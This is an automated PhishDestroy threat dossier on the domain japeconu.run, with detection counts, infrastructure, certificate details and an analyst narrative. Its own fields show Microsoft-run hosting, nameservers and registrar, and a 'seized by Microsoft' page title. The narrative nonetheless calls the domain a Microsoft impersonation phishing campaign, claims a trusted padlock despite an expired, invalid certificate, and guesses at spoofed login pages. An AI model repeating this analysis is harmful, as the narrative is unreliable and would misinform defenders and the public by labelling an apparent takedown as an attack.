# PhishDestroy threat dossier — japeconu.run ================================================================ Fetched: 2026-05-05 13:01:55 UTC Canonical: https://phishdestroy.io/domain/japeconu.run/ ## VERDICT ---------------------------------------------------------------- CRITICAL THREAT — DO NOT VISIT Composite threat score: 100/100 (PhishDestroy scoring — see methodology below) Scam classification: Impersonation Targeted brand: Microsoft ## DETECTION EVIDENCE ---------------------------------------------------------------- VirusTotal: 19/95 security vendors flagged this domain Flagging vendors: ADMINUSLabs, alphaMountain.ai, AlphaSOC, Antiy-AVL, ArcSight Threat Intelligence, BitDefender, Chong Lua Dao, CRDF, CyRadar, ESET, Forcepoint ThreatSeeker, Fortinet, G-Data, Kaspersky, Lionic, SOCRadar, Sophos, VIPRE, Webroot Public blocklists: listed on 1 independent blocklist ## INFRASTRUCTURE ---------------------------------------------------------------- IP address: 40.91.108.115 (US, Quincy) ASN: AS8075 Microsoft Corporation Hosting org: Microsoft Azure Cloud (westus2) Registrar: MarkMonitor Inc. Nameservers: ns001.microsoftinternetsafety.net, ns002.microsoftinternetsafety.net Registered: 2025-04-10 Expires: 2027-04-10 Page title: This website domain has been seized by Microsoft HTTP response: 200 ## TLS CERTIFICATE ---------------------------------------------------------------- Issuer: Microsoft Corporation / Microsoft Azure RSA TLS Issuing CA 08 Expires: 2026-03-18 Status: INVALID chain Fingerprint: 03a31abfd38e04030dd4050ccd0e30b3a0b0514bea32c62ff810290ae37e40b4 Subject Alternative Names (related infrastructure — often same operator): - animatcxju.live - araucahkbm.live - boreholeconstruction.org - castmann.run - castmaxw.run - catterjur.run - changenwg.run - chipkitk.run - chivalryr.run - civitasu.run - clearui.run - coilylove.run - cometusm.run - coyoteqw.run - daggerpewl.run ... +134 more ## ABUSE-REPORT HISTORY (evidence of registrar non-response) ---------------------------------------------------------------- Status: pending notification queue. No abuse reports filed yet — this domain is waiting for the next cycle of our automated abuse-reporter. ## TIMELINE ---------------------------------------------------------------- Domain registered: 2025-04-10 (per WHOIS / CT — may reflect a renewal or transfer date, not first-ever registration) First detected: 2026-05-05 13:00:15 UTC (by PhishDestroy tracker) Last verified: 2026-05-05 16:00:06 UTC Current status: ACTIVE / observable ## EXTERNAL CORROBORATION (third-party evidence) ---------------------------------------------------------------- URLScan.io: https://urlscan.io/result/019df792-0e12-70ea-8f96-506342a1e632/ Wayback Machine: https://web.archive.org/web/*/japeconu.run crt.sh CT logs: https://crt.sh/?q=%25.japeconu.run Google transparency: https://transparencyreport.google.com/safe-browsing/search?url=japeconu.run AlienVault OTX: https://otx.alienvault.com/indicator/domain/japeconu.run URLhaus: https://urlhaus.abuse.ch/host/japeconu.run/ ## ANALYST NARRATIVE ---------------------------------------------------------------- [Generated: 2026-05-05 13:01:22 UTC — narrative may predate facts above. Treat fields in TIMELINE / DETECTION EVIDENCE / INFRASTRUCTURE as authoritative if they differ from the prose below.] PhishDestroy identifies domain japeconu.run as an active Microsoft brand impersonation campaign designed to deceive users into surrendering credentials or installing malware under the guise of a domain seizure notice. The page title 'This website domain has been seized by Microsoft' directly mirrors legitimate Microsoft enforcement communications, leveraging urgency and authority to bypass user scrutiny. No cryptocurrency drainer kit or malicious payload has been confirmed in initial sandbox analysis, suggesting primary focus on credential harvesting via spoofed login portals or credential prompt overlays. The domain’s rapid deployment and use of Microsoft-branded SSL certificate indicate a coordinated, likely automated campaign targeting organizations or end-users accustomed to receiving legitimate domain enforcement notices from Microsoft. This domain was flagged by 19 of 95 VirusTotal participating engines, showing elevated risk despite low blocklist coverage (1 security vendor, Maltrail). Registered through MarkMonitor Inc. on April 10, 2025, japeconu.run resolves to IPv4 address 40.91.108.115, hosted on infrastructure historically associated with Microsoft-related services. The SSL certificate is issued to 'Microsoft Corporation', enabling visual trust through green padlock indicators in browsers. The domain’s recent creation date and clean infrastructure reputation suggest a short-lived operation intended to exploit temporary trust signals. Notably, no Google Safe Browsing (GSB) listing was detected at time of analysis, enabling continued accessibility to potential victims. As of this investigation, japeconu.run remains active and accessible, with active redirection pathways likely delivering spoofed Microsoft login pages. Immediate blocking at DNS and network levels is advised across all security layers. Users should verify domain enforcement notices directly through Microsoft’s official channels (domains@microsoft.com or portal.azure.com) and avoid clicking embedded links in unsolicited emails or pop-ups. The remaining risk is elevated due to the domain’s impersonation of high-trust brand communications and potential for rapid propagation through phishing emails leveraging the 'domain seized' lures. Microsoft Security Response Center should be notified via secure@microsoft.com with full IOCs to support takedown efforts. ## EVIDENCE HASHES ---------------------------------------------------------------- TLS cert SHA-256: 03a31abfd38e04030dd4050ccd0e30b3a0b0514bea32c62ff810290ae37e40b4 ## SCORING METHODOLOGY ---------------------------------------------------------------- Composite score is NOT derived from VirusTotal alone. PhishDestroy aggregates: - VirusTotal positive ratio - Public blocklist consensus (MetaMask, ScamSniffer, OpenPhish, PhishTank, URLhaus, CryptoFirewall, SEAL, Polkadot, Enkrypt, Phishunt, DiscordPhishing, PhishingDB) - Cloaking detection (HTTP 666 or rendering delta between bot and real visitor) - DNS-filter consensus (Quad9, CleanBrowsing, NextDNS, AdGuard, Cloudflare, etc.) - AlienVault OTX pulses + Cloudflare Radar + Google Safe Browsing - URLScan / URLQuery verdicts - Brand-impersonation heuristics (DOM analysis of forms, logos, wording) - Known phishing-kit fingerprinting (favicon hash, JS obfuscation signatures) - Wallet-drainer family classification (Angel, MS, Rainbow, Pink, Inferno, ...) - Free-TLS vs paid-cert ratio (throwaway infrastructure signal) - Registrar/hosting abuse history (this registrar's track record) - Human researcher sign-off (volunteer takedown team) A domain present in our database is ALREADY flagged. A low VT count by itself does NOT mean the domain is safe — new scam domains routinely show 0/95 VT for their first 7–30 days while actively draining wallets. Always cross-reference the composite score and the individual indicators above, not just VT. ## CORRECTIONS / APPEALS ---------------------------------------------------------------- Full HTML report: https://phishdestroy.io/domain/japeconu.run/ JSON API: https://api.destroy.tools/v1/check?domain=japeconu.run Appeal a flag: https://phishdestroy.io/appeals/ (responded to within 48 hours, FP rate <0.01%) Submit a report: https://t.me/PhishDestroy_bot About PhishDestroy: volunteer-driven open-source threat-intelligence platform. Tracked: 146,008 domains (61,917 alive under monitoring, 83,630 confirmed takedowns/dead). Site: https://phishdestroy.io